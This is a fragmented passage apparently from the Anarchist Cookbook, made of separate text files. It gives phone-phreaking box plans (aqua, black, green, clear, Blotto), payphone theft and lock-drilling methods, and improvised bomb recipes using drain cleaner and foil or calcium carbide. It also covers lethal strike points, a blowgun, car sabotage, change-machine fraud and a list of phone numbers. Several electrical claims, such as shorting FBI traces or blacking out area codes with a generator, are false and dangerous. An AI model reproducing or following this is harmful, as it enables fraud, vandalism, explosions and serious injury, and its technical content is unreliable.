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RCHY COOKBOOK v.666* By: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rged/Converted to Word Perfect 6.0 Format By: The Executioner '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Table of Cont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nterfeiting Mon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edit Card Frau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king Plastic Explosives from Ble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cking Master Loc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rts of Lockpicking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rts of Lockpicking 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idox Bomb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 Tech Revenge:  The Beigebox (NEW Revision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2 Bo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mite Bo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uch Explosi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ter Bo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int Bo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s to send a car to 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ya hate sch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related vandalis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way police radar jamm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oke Bo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Box Bo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twiring ca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pal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rtilizer Bo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nnis Ball Bo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kette Bo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isted Phone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make Potassium Nit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oding Lightbul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 water igni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e-brew blast cann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mical Equivalency L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Ta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ndm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different kind of Molitov Cockt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Systems Tutorial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Systems Tutorial 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 Alliance Teleconferenc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qua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ndenberg Bo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Kill Someone with your Bare H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Systems Tutorial I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lotto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g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own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um Carbide Bo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Ways to Send a Car to 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pping off Change Mach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r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NA Number Li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 Terroris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Start a Conference w/o 2600hz or M-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ynam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 Exhaust Flame Tho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Break into BBs Exp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bo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se Bo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eric Bo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n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able Grenade Launc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 Hacking Tutorial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 Hacking Tutorial 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DE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mless Bo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ing into Hou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pnotis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Informer Issue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ckpotting ATM Mach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g Bo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 at K-M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e Substit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Grow Marijuan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ch Head Bo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rorizing McDonal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tor's" Last Wo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yth of the 2600hz Detec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palm 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troglycerin Reci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ion: Fuck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aling Calls from Payph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ol F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e Post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stable Explosi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ird Dru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rt of C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gnizing Credit Ca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Get a New Ident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Informer Issue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Informer Issue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Informer Issue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Informer Issue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er's Guide to Loop L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Bell Tuto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Money out of Pay Ph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based PB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Pursuit Port Statisti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arl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reak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let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 Tras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adian WATS Phoneb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TR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VAX &amp; UN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ification Circu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LAST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ling with the Rate &amp; Rout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llular Phone Phrea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ese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Start Your Own Confer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ld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istory of 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unch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live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ron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TRW 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er's Phunh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ack Magazine - Vol. 3, Issue 27 (Intro to MID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ack Magazine - Vol. 3, Issue 27 (The Making of a Hac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ack Magazine - Vol. 3, Issue 28 (Network Miscell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ack Magazine - Vol. 3, Issue 28 (Pearl Box Schemat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ack Magazine - Vol. 3, Issue 28 (Snarfing Remote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rack Magazine - Vol. 3, Issue 30 (Western Union, Tel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WX &amp; Time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ack Magazine - Vol. 3, Issue 30 (Hacking &amp; Tym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rack Magazine - Vol. 3, Issue 30 (The DECWRL Mail Gate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Chlo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rcury Fulmin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rovised Black Pow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tric Ac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st Bomb Instru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on-Tet Explos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ing Picric Acid from Aspir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lamation of RDX from C-4 Explosi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gg-based Gelled Flame Fue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thespin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exible Plate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 Signature Systems (Silenc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ay Igniter From Cigaret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cot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ed Seed Ti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il Gren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 Gloss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Dial Locks -- How to Bea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hange Scan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hort History of Phrea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rets of the Little Blue Box" (s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istory of British Phrea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d as Shit" (s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cking with th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ack Magazine - Vol. 1, Issue 1 (The Phone Preak's Gu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Country Code Li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inity Transmitter Schematic and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S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nan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ummy Marihuana Recip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anu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mical Fire Bo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gniter from Book Matc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or White Powder" Propell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pe Hand Gren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uropean Credit Card Fraud (Written by Creditman!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okbook III Exclus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terfeiting Money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reading this article, it would be a very good idea to get a book on photo offset printing, for this is the method us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nterfeiting US currency.  If you are familiar with this meth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rinting, counterfeiting should be a simple task for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nuine currency is made by a process called "gravure", whi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olves etching a metal block.  Since etching a metal block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ssible to do by hand, photo offset printing comes in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to offset printing starts by making negatives of the curr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a camera, and putting the negatives on a piece of mas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terial (usually orange in color).  The stripped negati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only called "flats", are then exposed to a lithographic pl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an arc light plate maker.  The burned plates are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veloped with the proper developing chemical.  One at a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plates are wrapped around the plate cylinder of the p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ress to use should be an 11 by 14 offset, such as the AB D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60.  Make 2 negatives of the portrait side of the bill, and 1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ack side.  After developing them and letting them dry, t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m to a light table.  Using opaque on one of the portrait si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uch out all the green, which is the seal and the serial numb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ack side does not require any retouching, because it is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color.  Now, make sure all of the negatives are regist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d up correctly) on the flats.  By the way, every tim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 another serial number, shoot 1 negative of the portrait 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ut out the serial number, and remove the old serial number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lat replacing it with the new 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you have all 3 flats, and each represents a different col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lack, and 2 shades of green (the two shades of green are cre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mixing inks).  Now you are ready to burn the plates.  Take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thographic plate and etch three marks on it.  These marks m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2 and 9/16 inches apart, starting on one of the short ed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the same thing to 2 more plates.  Then, take 1 of the flat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ace it on the plate, exactly lining the short edge up with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dge of the plate.  Burn it, move it up to the next mark,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ver up the exposed area you have already burned.  Burn that,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the same thing 2 more times, moving the flat up one more ma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the same process with the other 2 flats (each on a sepa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ate).  Develop all three plates.  You should now have 4 ima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each plate with an equal space between each bi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aper you will need will not match exactly, but it will do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situations.  The paper to use should have a 25% rag cont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the way, Disaperf computer paper (invisible perforation) do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ob well.  Take the paper and load it into the press.  Be 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set the air, buckle, and paper thickness right.  Start with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lack plate (the plate without the serial numbers).  Wrap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ound the cylinder and load black ink in.  Make sure you run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 you need because there will be a lot of rejects.  Then, wh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is printing, mix the inks for the serial numbers and the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de.  You will need to add some white and maybe yellow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rial number ink.  You also need to add black to the back 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periment until you get it right.  Now, clean the press and pr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ther side.  You will now have a bill with no green seal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rial numbers.  Print a few with one serial number, make an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repeat.  Keep doing this until you have as many diffe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s as you want.  Then cut the bills to the exact size with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per cutter.  You should have printed a large amount of money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but there is still one problem;  the paper is pure white.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ye it, mix the following in a pan:  2 cups of hot water, 4 t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gs, and about 16 to 20 drops of green food coloring (experi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is).  Dip one of the bills in and compare it to a genu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 bill.  Make the necessary adjustments, and dye all the bil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so, it is a good idea to make them look used.  For exam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inkle them, rub coffee grinds on them,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before mentioned, unless you are familiar with photo off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inting, most of the information in this article will be fair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rd to understand.  Along with getting a book on photo off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inting, try to see the movie "To Live and Die in LA".  I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a counterfeiter, and the producer does a pretty good job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ing how to counterfeit.  A good book on the subject i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or Man's James Bo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all of this seems too complicated to you, there is one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thod available for counterfeiting:  The Canon color las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ier.  The Canon can replicate ANYTHING in vibrant col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cluding US currency.  But, once again, the main problem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terfeiting is the paper used.  So, experiment, and good lu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edit Card Fraud                brought to you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most of you out there, money is hard to come by.  Until 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e recent advent of plastic money (credit cards), i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asy to use someone else's credit card to order the items you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ways desired in life.  The stakes are high, but the payoff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th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One:  Getting the credit card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rst off, you must obtain the crucial item:  someone's cred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d number.  The best way to get credit card numbers is to t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lue carbons used in a credit card transaction at your loc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partment store.  These can usually be found in the garbage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xt to the register, or for the more daring, in the garb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umpster behind the store.  But, due to the large amount of cred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d fraud, many stores have opted to use a carbonless transa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et, making things much more difficult.  This is where y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comes in hand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rst, look up someone in the phone book, and obtain as m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rmation as possible about them.  Then, during business hou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 in a very convincing voice - "Hello, this is John Doe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Visa Credit Card Fraud Investigations Department.  We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en informed that your credit card may have been used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udulent purposes, so will you please read off the numb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pearing on your Visa card for verification."  Of course, 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imagination!  Believe it or not, many people will fall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ploy and give out their credit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assuming that you have your victim's credit card numbe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be able to decipher the information giv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Two:  Recognizing information from carbon cop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 examp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erican Exp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XXX XXXXXX X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M/Y1 THRU MM/Y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SHMO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erican Exp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XXX XXXXXX X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M/Y1 THRU MM/Y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SHMO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M/Y1 is the date the card was issued, and MM/Y2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piration date.  The American Express Gold Card has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XXXXXX XXXXXXXX XXXXXXXX, and is covered for up to $5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even if the card holder is bro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XXX XXXX XXXX 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XXX AAA DD-MM-YY MM/Y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SHMO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XXX in the second row may be asked for during the orde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rocess.  The first date is when the card was new, an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ond is when the card expires.  The most frequent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mbination used is 5424 1800 XXXX XXXX.  There are man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se cards in circulation, but many of these are on wan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sts, so check these fi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XXX XXX(X) XXX(X) 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M/YY    MM/YY*VI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SHMO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a is the most abundant card, and is accepted almo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erywhere.  The "*VISA" is sometimes replaced with "BWG",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llowed with a special code.  These codes ar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MM/YY*VISA V - Preferred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MM/YY*VISA CV - Classic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MM/YY*VISA PV - Premier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referred Cards are backed with money, and are much safer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  Classic Cards are newer, harder to reproduce cards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cent backing.  Premier Cards are Classic Cards with Prefe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verage.  Common numbers are 4448 020 XXX XXX, 4254 5123 6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XXX, and 4254 5123 8500 XXXX.  Any 4712 1250 XXXX XXXX ca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re IBM Credit Union cards, and are risky to use, alth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y are usually covered for large purcha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Three:  Testing cred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uld now have a Visa, Mastercard, or American Exp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edit card number, with the victim's address, zip code, and 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  By the way, if you have problems getting the add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phone companies offer the Address Tracking Service, which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pecial number you call that will give you an address from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one number, at a nominal charge.  Now you need to check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lance of credit on the credit card (to make sure you don't r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t of money), and you must also make sure that the card is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olen.  To do this you must obtain a phone number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sinesses use to check out credit cards during purchases.  If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to a department store, watch the cashier when someone make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edit card purchase.  He/she will usually call a phone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ive the credit information, and then give what is called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rchant Number".  These numbers are usually written down on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ound the register.  It is easy to either find these number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 them, or to wait until they call one in.  Watch what th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al and wait for the 8 digit (usually) merchant number.  Onc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 the number, in a calm voice, read off the account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rchant number, amount, and expiration date.  The credit burea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l tell you if it is ok, and will give you an authoriz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  Pretend you are writing this number down, and repea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ck to them to check it.  Ignore this number completely, for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rves no real purpose.  However, once you do this, the ba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moves dollars equal to what you told them, because the card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posedly used to make a purchase.  Sometimes you can trick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erator by telling her the customer changed his mind and deci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to charge it.  Of course, some will not allow this.  Reme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all times that you are supposed to be a store clerk calling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 out the card for a purchase.  Act like you are talking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customer when he/she "cance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Four:  The dr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ce the cards are cleared, you must find a place to hav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ckage sent.  NEVER use a drop more than once.  The following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ical drop si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An empty h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 empty house makes an excellent place to send things.  Sen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ckage UPS, and leave a note on the door saying, "UPS.  I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ys, 8 to 6.  Could you please leave the package on the back d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ep?"  You can find dozens of houses from a real estate agent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lling them you want to look around for a house.  Ask for a l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twenty houses for sale, and tell them you will check out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Do so, until you find one that suits your nee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Rent A Spo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Haul sometimes rents spaces where you can have packages sent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ed for.  End your space when the package arr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People's hou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d someone you do not know, and have the package sent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 ahead saying that "I called the store and they sent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ckage to the wrong address.  It was already sent, but can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ep it there for me?"  This is a very reliable way if you kee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m when talking to the peo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NOT try post office boxes.  Most of the time, UPS will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liver to a post office box, and many people have been caught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ast attempting to use a post office box.  Also, when you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termined a drop site, keep an eye on it for suspic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acters and cars that have not been there bef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Five:  Making the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uld now have a reliable credit card number with all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cessary billing information, and a good drop s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est place to order from is catalogues, and mail order hou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is in your best interest to place the phone call from a p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one, especially if it is a 1-800 number.  Now, when you c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try to disguise your voice, thinking you will trick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lesperson into believing you are an adult.  These folks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ained to detect this, so your best bet is to order in your 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oice.  They will ask for the following:  name, name as it app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card, phone number, billing address, expiration date, method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pping, and product.  Ask if they offer UPS Red shipping (n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y arrival), because it gives them less time to research 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der.  If you are using American Express, you might have a bit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problem shipping to an address other than the billing add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so, if the salesperson starts to ask questions, do NOT hang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talk your way out of the situation, so you won't encour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estigation on the or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everything goes right, you should have the product, fre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rge.  Insurance picks up the tab, and no one is any wiser.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eful, and try not to order anything over $500.  In some st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PS requires a signature for anything over $200, not to men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anything over $200 is defined as grand theft, as well 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edit fraud.  Get caught doing this, and you will bite it fo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ple of years.  Good lu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ing Plastic Explosives from Bleach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tassium chlorate is an extremely volatile explosive comp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has been used in the past as the main explosive filler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enades, land mines, and mortar rounds by such countries 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nce and Germany.  Common household bleach contains a sm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ount of potassium chlorate, which can be extracted by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 that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off, you must obt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A heat source (hot plate, stove,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 hydrometer, or battery hydro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A large Pyrex, or enameled steel container (to wei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emic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Potassium chloride (sold as a salt substitute at health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utrition sto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one gallon of bleach, place it in the container, and beg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ating it.  While this solution heats, weigh out 63 gram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tassium chloride and add this to the bleach being he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ly check the solution being heated with the hydrome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boil until you get a reading of 1.3.  If using a batt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meter, boil until you read a FULL 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the solution and allow it to cool in a refrigerator until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between room temperature and 0 degrees Celcius.  Filter out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ystals that have formed and save them.  Boil this solution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ool as before.  Filter and save the cryst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the crystals that have been saved, and mix them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tilled water in the following proportions:  56 grams per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lliliters distilled water.  Heat this solution until it boi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allow to cool.  Filter the solution and save the crystals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m upon cooling.  This process of purification is cal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ctional crystalization".  These crystals should be relativ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re potassium chlo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wder these to the consistency of face powder, and heat gently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ve off all mois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melt five parts Vaseline with five parts wax.  Dissolve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white gasoline (camp stove gasoline), and pour this liquid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90 parts potassium chlorate (the powdered crystals from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o a plastic bowl.  Knead this liquid into the potassi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lorate until intimately mixed.  Allow all gasoline to evapo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ally, place this explosive into a cool, dry place.  Avo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iction, sulfur, sulfides, and phosphorous compounds.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plosive is best molded to the desired shape and density of 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ams in a cube and dipped in wax until water proof.  These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pe charges guarantee the highest detonation velocity.  Also,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sting cap of at least a 3 grade must be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resence of the afore mentioned compounds (sulfur, sulfi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tc.) results in mixtures that are or can become highly sensi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ill possibly decompose explosively while in storag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uld never store homemade explosives, and you must use EXTRE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at all times while performing the processes in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tic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obtain a catalog of other subject of this nature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i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formation Publishing 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x 1004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dessa, Texas  7976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cking Master Lock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you ever tried to impress someone by picking one of th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 combination locks and fail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ster lock company made their older combination locks with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tection scheme.  If you pull the handle too hard, the knob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turn.  That was their biggest mista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rst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t out any of the Master locks so you know what is going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pulling on the clasp (part that springs open when you g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mbination right), turn the knob to the left until it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move any more, and add five to the number you reach.  You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the first number of the combin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cond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in the dial around a couple of times, then go to the fi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 you got.  Turn the dial to the right, bypassing the fi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 once.  When you have bypassed the first number, st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lling on the clasp and turning the knob.  The knob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tually fall into the groove and lock.  While in the gro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ll the clasp and turn the knob.  If the knob is loose, go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xt groove, if the knob is stiff, you have the second number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mbin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hird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getting the second number, spin the dial, then enter the tw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s.  Slowly spin the dial to the right, and at each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ll on the clasp.  The lock will eventually open if you di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cess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method of opening Master locks only works on older mode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one informed Master of their mistake, and they employed a n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chanism that is foolproof (for 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rts of Lockpicking I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kpicking I:  Cars and assorted other loc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the basic themes of lockpicking and uninvited entry have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nged much in the last few years, some modern device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ques have appeared on the sce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mob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ny older automobiles can still be opened with a Slim Jim typ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ener (these and other auto locksmithing techniques are cov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lly in the book "In the Still of the Night", by John Russ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II);  however, many car manufacturers have built cases ove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ck mechanism, or have moved the lock mechanism so the Slim J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not work.  S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erican Locksmith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 Box 2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lver City, CA  9023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 offers a new and improved Slim Jim that is 30 inches long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4 inches wide, so it will both reach and slip through the n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 lock covers (inside the door).  Price is $5.75 plus $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tage and hand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s manufactured by General Motors have always been a bane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ople who needed to open them, because the sidebar locking un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employ is very difficult to pick.  To further complic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ters, the new GM cars employ metal shields to make the use o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im Jim type instrument very difficult.  S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k Technology Corpo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85 Main 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Rochelle, NY  108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C offers a cute little tool which will easily remove the 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ylinder without harm to the vehicle, and will allow you to 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or start the vehicle.  The GMC-40 sells for $56.00 plus $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postage and hand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est general automobile opening kit is probably a set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kout tools offered b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ck MFG Corpo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19 W. Stewart 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yton, OH  4540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29.95 one can purchase a complete set of six carbon lock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ls that will open more than 95% of all the cars a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wickset locks have become quite popular as one step secur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cks for many types of buildings.  They are a bit harder to p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offer a higher degree of security than a normal buil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alled door lock.  S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F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51 Wallace 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silon, OH  4464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ice is $11.95.  Kwickset locks can handily be disassembled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oor opened without harm to either the lock or the door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the above mentioned Kwick Out to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are too lazy to pick auto loc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ehof Supp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 36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m Lake, IO  5058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S sells tryout keys for most cars (tryout keys are used si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is no one master key for any one make of car, but there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oup type masters (a.k.a. tryout keys).  Prices average ab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00 a s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dated Lockpick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years, there have been a number of pick attack procedures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pin and tumbler lock systems.  In reverse order of ease th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rmal Picking:  Using a pick set to align the pins, one by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ntil the shear line is set and the lock ope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cking:  This method uses picks that are constructed with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ries of bumps, or diamond shape notches.  These pic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re "raked" (i.e. run over all the pins at one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luck, the pins will raise in the open positio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y there.  Raking, if successful, can be much les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 effort than standard pick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ck Aid Gun:  This gun shaped device was invented a number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years ago and has found application with m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ocksmiths and security personnel.  Basicall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edle shaped pick is inserted in the snou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gun", and the "trigger" is pulled.  This a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naps the pick up and down strongly.  If the tip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lipped under the pins, they will also be snapp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p and down strongly.  With a bit of luck they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trike each other and separate at the she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 a split second.  When this happens the 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ill open.  The lock aid gun is not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uccessful, but when it does work, the results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ery dramatic.  You can sometimes open the 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one snap of the trig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brator:  Some crafty people have mounted a needle pick into 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ectric toothbrush power unit.  This vibrating eff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ll sometimes open pin tumbler locks -- instant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now another method to open pin and wafer locks in a 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rt time.  Although it resembles a toothbrush pick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earance, it is actually an electronic device.  I am speaking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bra pick that is designed and sold b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d Corpo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 Box 56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ottsdale, AR  8525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bra uses two nine volt batteries, teflon bearings (for l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ise), and a cam roller.  It comes with three picks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erent types of locks) and works both in America and overse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pin or wafer locks.  The Cobra will open group one loc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mon door locks) in three to seven seconds with no damage,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ands of an experienced locksmith.  It can take a few seco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re or up to a half a minute for someone with no experience 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It will also open group two locks (including govern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gh security, and medecos), although this can take a short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er.  It will not open GM sidear locks, although a devic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to be introduced to fill that gap.  How much for this to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ill open most locks in seven seco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35.00 plus $4.00 shipping and hand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you hard core safe crackers, FC also sells the MI-6 that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en most safes at a cost of $10,000 for the three wheel att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l, and $10,500 for the four wheel model.  It comes in a stur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carrying case with monitor, disk drive and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none of these safe and sane ideas appeal to you, you can alw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 back on the magic thermal l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hermal lance is a rather crude instrument constructed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8 inch hollow magnesium rods.  Each tube comes in a 10 fo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ngth, but can be cut down if desired.  Each one is threaded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end.  To use the lance, you screw the tube together with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tted regulator (like a welding outfit uses) and hook up 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xygen tank.  Then oxygen is turned on and the rod is lit with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ndard welding ignitor.  The device produces an incred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ount of heat.  It is used for cutting up concrete blocks or e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ocks.  An active lance will go through a foot of steel in a f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onds.  The lance is also known as a burning bar, and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vailable fr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 MF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748 W. Addi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icago, IL  606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rts of Lockpicking II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you want to be a criminal.  Well, if you want to be like Jam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nd and open a lock in fifteen seconds, then go to Hollyw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that is the only place you are ever going to do it.  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erienced locksmiths can spend five to ten minutes on a lock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are unlucky.  If you are wanting extremely quick access, l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sewhere.  The following instructions will pertain mostly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k in knob" type lock, since it is the easiest to p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rst of all, you need a pick set.  If you know a locksmith, g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m to make you a set.  This will be the best possible se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use.  If you find a locksmith unwilling to supply a set, do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up hope.  It is possible to make your own, if you have a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 grinder (you can use a file, but it takes fore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hing you need is an allen wrench set (very small).  The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uld be small enough to fit into the keyhole slot.  Now, b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ong end of the allen wrench at a slight angle (not 9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grees).  Now, take your pick to a grinder or a file, and smoo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end until it is rounded so it won't hang inside the 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st your tool out on doorknobs at your house to see if it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lide in and out smoothly.  Now, this is where the screwdri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s in.  It must be small enough for it and your pick to be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same lock at the same time, one above the other.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instructions, please refer to this chart of the interior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    / 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Y           [|]  Upper tumbler p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H           [^]  Lower tumbler p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    \ O           [-]  Cylinder w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   (This is a greatly simplif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E    dra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bject is to press the pin up so that the space betwee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per pin and the lower pin is level with the cylinder wall.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push a pin up, it's tendency is to fall back dow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is where the screwdriver comes in.  Insert the screwdri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the slot and turn.  This tension will keep the "solved" p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falling back down.  Now, work from the back of the lock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ront, and when you are through, there will be a click,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ewdriver will turn freely, and the door will op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not get discouraged on your first try!  It will probably t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bout twenty to thirty minutes your first time.  After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ill quickly improve with pract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idox Bomb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people are not aware that a volatile, extremely explos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mical can be bought over the counter:  Solido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idox comes in an aluminum can containing 6 grey sticks, and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bought at Kmart, and various hardware supply shops for a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00.  Solidox is used in welding applications as an oxidiz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t for the hot flame needed to melt metal.  The most ac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gredient in Solidox is potassium chlorate, a filler used in m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litary applications in the WWII er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nce Solidox is literally what the name says:  SOLID OXygen,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ust have an energy source for an explosion.  The most commo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dily available energy source is common household sugar,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crose.  In theory, glucose would be the purest energy sour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is hard to find a solid supply of gluco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ing the mix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Open the can of Solidox, and remove all 6 sticks.  One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ne, grind up each of the sticks (preferably with a mort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pestle) into the finest powder possi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The ratio for mixing the sugar with the Solidox is 1:1,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igh the Solidox powder, and grind up the equivalent amo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su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Mix equivalent amounts of Solidox powder, and sugar in a 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ati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is just that simple!  You now have an extremely power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stance that can be used in a variety of applications.  A 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aution:  be EXTREMELY careful in the entire process.  Avo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iction, heat, and flame.  A few years back, a teenager I kn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lew 4 fingers off while trying to make a pipe bomb with Solido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ave been war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 Tech Revenge: The Beigebox  rev.2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you ever wanted a lineman's handset? Surely every phreak has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st once considered the phun that he could have with one. After sear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ocked phone company trucks for months, we had an idea. We could bui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We did, and named it the "Beige Box" simply because that is the col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ou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eigebox is simply a consumer lineman's handset, which i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one that can be attached to the outside of a person's house.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bricate a beigebox, follow alo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struction and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struction is very simple. First you must understand the concep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vice. In a modular jack, there are four wires. These are red, g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llow, and black. For a single line telephone, however, only two ma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d (ring) and green (tip). The yellow and the black are not neccess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is project. A lineman's handset has two clips on it: the ring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ip. Take a modular jack and look at the bottom of it's casing.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be a grey jack with four wires  (red, green, yellow &amp; bl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ing out of it. To the end of the red wire attach a red aligator cl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end of the green wire attatch a green aligator clip. The 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lack wires can be removed, although I would only set them aside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you can use the modular jack in future projects. Now insert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s modular plug into the modular jack. That's it. This particul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l is nice because it is can be easily made, is inexpensive, u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on parts that are readily available, is small, is lightwe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does not require the destruction of a ph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ige Box U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many uses for a Beige Box. However, before you can us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ust know how to attach it to the output device. This device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ny of Bell switching apparatus that include germinal sets (i.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switching centers, bridgin heads, cans, etc.). To open most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switching apparatus, you must have a 7/16 inch hex dri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good pair of needle nose pliers work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piece of equipment can be picked up at your local hardware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hex driver (or pliers), turn the security bolt(s) approxima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 of an inch counter-clockwise and open. If your output device is lock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you must have some knowledge of destroying and/or picking loc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 we have never encountered a locked output device. Once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ed your output device, you should see a mass of wires connect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minals. On most output devices, the terminals should be labeled "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p -- if not labeled, it is usually on the left) and "R" (Ring --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labeled, usually on the ri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Ring - red - right. The "Three R's" -- a simple wa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which is which. Now you must attach all the red alligator cl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g) to the "R" (Ring)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ach the green alligator clip (Tip) to the "T" (Tip)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If instead of a dial tone you hear nothing, adjust the allig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ps so that they are not touching each other terminals. Also make s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are firmly attached. By this time you should hear a dial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ANI to find out the number you are using (you wouldn't want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own). Here are some practicle aplic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Eavesdropp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Long distance, static free free fone calls to phrie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Dialing direct to Alliance Teleconferencing (also no stat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Phucking people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Bothering the operator at little risk to your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Blue Boxing with greatly reduced chance of getting cau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Anything at all you want, since you are on an extension of that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vesdropp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e most effective, first attach the Beige Box then your phone.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iminates the static caused by connecting the box, ther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ucing the potential suspicion of your victim. When eavesdropp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allways best to be neither seen nor heard. If you hear some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ing out, do not panic; but rather hang up, wait, and pick up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iver again. The person will either have hung up or tried to comple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r call again. If the latter is true, then listen in, and perhap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find information worthy of blackmail! If you would like to know wh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re listening to, after dialing ANI, pull a CN/A on the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ing Long Di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ection is self explanitory, but don't forget to dial a "1" b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ing Direct to Aliance Teleconferenc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dial 0-700-456-1000 and you will get instructions from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refer this method over PBX's, since PBX's often have poor recep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re more dificult to come b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ucking People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a very large topic of discussion. Just by using the other topi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cribed, you can create a large phone bill for the person (they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have to pay for it, but it will be a big hassle for them). In addi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you are an extension of the person's line, you can leave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off the hook, and they will not be able to make or receive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an be extremely nasty because no one would expect the ca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the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thering th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also self explanitary and can provide hours of entertain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ask her things that are offensive or you would not like trac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your line. This also corresponds to the previously described s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ucking People Over. After all, guess who's line it gets trac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he h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a file on Blue Boxing for more details. This is an especially n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ature if you live in an ESS-equiped prefix, since the calls are, o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ain, not traced to your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ENTIAL RISKS OF BEIGE BOX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use of the Beige Box may cause suspicians within the Gestap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result in legal problems. Therefor, I would recomend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Choose a secluded spot to do your Beige Box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Use more than one output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Keep a low profile (i.e., do not post under your re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ame on a public BBS concering your occomplish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In order to make sure the enemy has not been inside your out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vice, I recomend you place a piece of transparent tape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opening of your output device. Therefor, if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pened in your abscence, the tapqe will be displace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will be aware of the fact that someone has intru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 your terit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imagine the possibilities:  a $2000 dollar phone bill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special person, 976 numbers galore, even harassing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erator at no risk to you!  Think of it as walking into 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emies house, and using their phone to your heart's cont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 to make a CO2 bomb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ill have to use up the cartridge first by either shooting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whatever. With a nail, force a hole bigger so as to allow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wder and wick to fit in easily. Fill the cartridge with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wder and pack it in there real good by tapping the bottom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tridge on a hard surface (I said TAP not SLAM!). Insert a f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ecommend a good water-proof cannon fuse, or an m-80 type f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firecracker fuses work, if you can run like a black man ru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the cops after raping a white girl.) Now, light it and r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hell! It does wonders for a row of mailboxes (like the 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apartment complexes), a car (place under the gas tank),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cture window (place on window sill), a phone booth (place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der the phone), or any other devious place. This thing th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rapnel, and can make quit a mess!!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mite II... or A better way to make Thermite        by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mite is nasty shit. Here is a good and easy way to mak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irst step is to get some iron-oxide (which is RUST!). Here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good way to make large quantities in a short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Get a DC convertor like the one used on a train set. Cut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or off, seperate the wires, and strip them bo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Now you need a jar of water with a tablespoon or so of sodi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loride (which is SALT!) added to it. This makes the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uc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Now insert both wires into the mixture (I am assuming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ugged the convertor in...) and let them sit for five minu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of them will start bubbling more than the other. This i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ITIVE(+) wire. If you do not do this test right, the fin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duct will be the opposite (chemically) of rust, which is R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ID. You have no use for this here (although it IS usefu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Anyway, put the nail tied to the positive wire into the jar.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t the negative wire in the other end. Now let it sit over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n the morning scrape the rust off of the nail &amp; repeat unt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got a bunch of rust on the bottom of the glass. Be gener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your rust collection. If you are going through the troubl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ing thermite, you might as well make a lot, ri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Now remove the excess water and pour the crusty solution onto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okie sheet. Dry it in the sun for a few hours, or in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vernight. It should be an orange-brown color (although I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en it in many different colors! Sometimes the color gets fuc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what can I say... but it is still iron ox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Crush the rust into a fine powder and heat it in a cast-iron p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til it is red. Now mix the pure iron oxide with pure allumin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linos which can be bought or filed down by hand from an alumin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ube or bar. The ratio or iron oxide to aluminum is 8 grams to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ngrats! You have just made THERMITE! Now, to light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Thermite requires a LOT of heat (more than a blow torch!)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gnite. However, a magnesium ribbon (which is sorta hard to f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 around) will do the trick.  It takes the heat from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rning magnesium to light the therm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Now when you see your victim's car, pour a fifty-cent sized p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to his hood, stick the ribbon in it, and light the ribbon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low torch. Now chuckle as you watch it burn through the h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lock, the axle, and the pavement. BE CAREFUL! The ide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xtures can vaporize CARBON STEEL! Another idea is to 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mite to get into pay phone cash boxes. HAVE FUN!!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uch Explosive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sort of a mild explosive, but it can be quite dangerou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rge quantities. To make touch explosive (such as that found in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nap-n-pop, but more powerful), use this reci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Mix iodine crystals into ammonia until the iodine crystals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dissolve into the ammonia anymore. Pour off the excess ammon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dry out the crystals on a baking sheet the same way as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ed the thermite (in other words, just let it sit overni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Be careful now because these crystals are now your to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plosive. Carefully wrap a bunch in paper (I mean carefu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iction sets 'em off!) and throw them around.. pretty loud, hu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are fun to put on someone's chair. Add a small fish sinker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m and they can be thrown a long distance (good for crow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otball games, concerts, etc.) Have fun!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ter Bomb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You will first have to make a mild version of thermite. Use m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cipe, but substitute iron fillings for ru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Mix the iron with aluminum fillings in a ratio of 75% alumin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25% iron. This mixture will burn violently in a closed sp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h as an envelope). This bring us to our next ingredi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Go to the post office and buy an insulated (padded) envelo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the type that is double layered... Seperate the lay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place the mild thermite in the main section, where the l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go. Then place magnesium powder in the outer layer. There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om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Now to light it... this is the tricky part and hard to expl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keep experimenting until you get something that work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se is just that touch explosive I have told you about in an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of my anarchy files. You might want to wrap it like a l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igarette and then place it at the top of the envelope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ter layer (on top of the powdered magnesium). When the to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plosive is torn or even squeezed hard it will ignit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wdered magnesium (sort of a flash light) and then it will bu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ild thermite. If the thermite didn't blow up, it would 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ast burn the fuck out of your enemy (it does wonders on hu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es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hat is REVENG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int Bomb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make a pain bomb you simply need a metal pain can with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fastenable lid, a nice bright color paint (green, pink, pur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some gross color is perfect!), and a quantity of dry ice. P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aint in the can and then drop the dry ice in. Quicky p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op on and then run like hell! With some testing you can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to a science. It depends on the ratio of dry ice to paint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ize of the can to how full it is. If you are really pis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f at someone, you could place it on their doorstep, knock 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or, and then run!! Paint will fly all over the place HAHAH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s to send a car to Hell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1001 ways to destroy a car but I am going to cover o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nes that are the most fun (for you), the most destruc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hem), and the hardest to trace (for the co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lace thermite on the hood, light it, and watch it burn all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through the pav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Tape a CO2 bomb to the hood, axel, gas tank, wheel, muff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ut a tampon, dirt, sugar (this on is good!), a ping pong b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just about anything that will dissolve in the gas tan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ut potatoes, rocks, banannas, or anything that will fit, in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ailpipe. Use a broom handle to stuff 'em up in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ilpi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ut a long rag into the gas tank and light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teal a key, copy it, replace it, and then steal the stere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Break into the car. Cut a thin metal ruler into a shape li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lide it into the outside window and keep pulling it back up unt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tch the lock cable which should unlock the door. This de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also called a SLIM JIM. Now get the stereo, equalizer, rad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tector, etc. Now destroy the inside. (A sharp knife does wond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ea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Fun!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ya hate school?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One of my favorites for getting out of a class or two is to c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a bomb threat. Tell 'em that it is in a locker. Then they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eck them all, whilst you can slip away for an hour or tw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even place a fake bomb (in any locker but YOURS!). Th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ght cancel school for a week while they investigate (of cour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ill probably have to make it up in the summ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Get some pure potassium or pure sodium, put it in a capsul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sh it down the toilet (smells awful! Stinks up the whole scho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se a smoke grenade in the hall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teal the computer passwords &amp; keys. Or steal the 80 column ca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ide if they are (gag) IB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ake friends with student assistants and have them change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des when the teachers hand in their bubble sheets for the rep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Spit your gum out on the carpet in the library or whatever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ind it into the carpet. Watch the janitors c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Draw on lockers or spraypaint on the building that the princip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a fasci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tick a potato in the tailpipe of the principal's c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SE YOUR IMAGINATION!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related vandalism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live where there are underground lines then you will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le to ruin someone's phone life very easily. All you must do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to their house and find the green junction box that interfa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ir line (and possibly some others in the neighborhood) with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jor lines. These can be found just about anywhere but they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ually underneath the nearest phone pole. Take a socket wren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loosen the nut on the right. Then just take clippers o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ledge hammer or a bomb and destroy the insides and pull up the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one cable. Now cut it into segments so it can't be fixed b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t be replaced (There is a week's worth of work for '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way radar jamming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drivers wanting to make better time on the open road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vest in one of those expensive radar detectors. However,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vice will not work against a gun type radar unit in which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ar signal is not present until the cop has your car in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ghts and pulls the trigger. Then it is TOO LATE for you to s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wn. A better method is to continuously jam any signal with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ar signal of your own. I have tested this idea with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operation of a local cop and found that his unit reads rand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s when my car approached him. It is suprisingly easy to m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low power radar transmitter. A nifty little semiconductor 